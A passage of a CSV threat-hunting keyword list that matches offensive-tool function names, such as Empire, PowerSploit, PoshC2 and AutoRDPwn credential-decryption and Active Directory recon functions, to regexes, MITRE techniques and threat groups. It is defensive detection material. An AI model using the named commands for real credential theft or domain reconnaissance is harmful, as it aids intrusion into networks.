T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - 
Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","45948" "*getCrossC2Site*",".{0,1000}getCrossC2Site.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - 
menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","45949" "*Get-DCBadPwdCount*",".{0,1000}Get\-DCBadPwdCount.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-SMBAutoBrute.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45950" "*Get-DCsNotOwnedByDA*",".{0,1000}Get\-DCsNotOwnedByDA.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","45951" "*Get-DecodedPassword*",".{0,1000}Get\-DecodedPassword.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","45952" "*Get-DecodedPassword*",".{0,1000}Get\-DecodedPassword.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","45953" "*Get-DecryptedCpassword*",".{0,1000}Get\-DecryptedCpassword.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","45954" "*Get-DecryptedCpassword*",".{0,1000}Get\-DecryptedCpassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SiteListPassword.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45955" "*Get-DecryptedPassword*",".{0,1000}Get\-DecryptedPassword.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","45956" "*Get-DecryptedPassword*",".{0,1000}Get\-DecryptedPassword.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","45957" "*Get-DecryptedSitelistPassword*",".{0,1000}Get\-DecryptedSitelistPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SiteListPassword.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45958" "*get-delegation *All*",".{0,1000}get\-delegation\s.{0,1000}All.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. 
and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","N/A","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","45959" "*get-delegation *Unconstrained*",".{0,1000}get\-delegation\s.{0,1000}Unconstrained.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","N/A","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","45960" "*Get-DFSshare*",".{0,1000}Get\-DFSshare.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45961" "*Get-DiscosdurosGet-PSDrive*",".{0,1000}Get\-DiscosdurosGet\-PSDrive.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","45963" "*getdllbaseaddress*",".{0,1000}getdllbaseaddress.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - 
TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45964" "*get-dodgyprocesses*",".{0,1000}get\-dodgyprocesses.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45965" "*Get-DomainAdmins.ps1*",".{0,1000}Get\-DomainAdmins\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","45966" "*Get-DomainComputer -Ping | select name,logoncount,descreption,operatingsystem*",".{0,1000}Get\-DomainComputer\s\-Ping\s\s\|\sselect\sname,logoncount,descreption,operatingsystem.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG 
PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45967" "*Get-DomainComputer -TrustedToAuth | select name",".{0,1000}Get\-DomainComputer\s\-TrustedToAuth\s\|\sselect\sname","offensive_tool_keyword","AD exploitation cheat sheet","msds-allowedtodelegateto*","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","Black Basta","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45968" "*Get-DomainDFSshare*",".{0,1000}Get\-DomainDFSshare.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45970" "*Get-DomainDFSShareV1*",".{0,1000}Get\-DomainDFSShareV1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45971" "*Get-DomainDFSShareV2*",".{0,1000}Get\-DomainDFSShareV2.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45972" "*Get-DomainFileServer*",".{0,1000}Get\-DomainFileServer.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45973" "*Get-DomainForeignGroupMember*",".{0,1000}Get\-DomainForeignGroupMember.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Abusing inter-forest trust Powersploit","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation tool","https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainForeignGroupMember/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45974" "*Get-DomainForeignUser*",".{0,1000}Get\-DomainForeignUser.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45975" "*Get-DomainGPOComputerLocalGroupMapping*",".{0,1000}Get\-DomainGPOComputerLocalGroupMapping.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 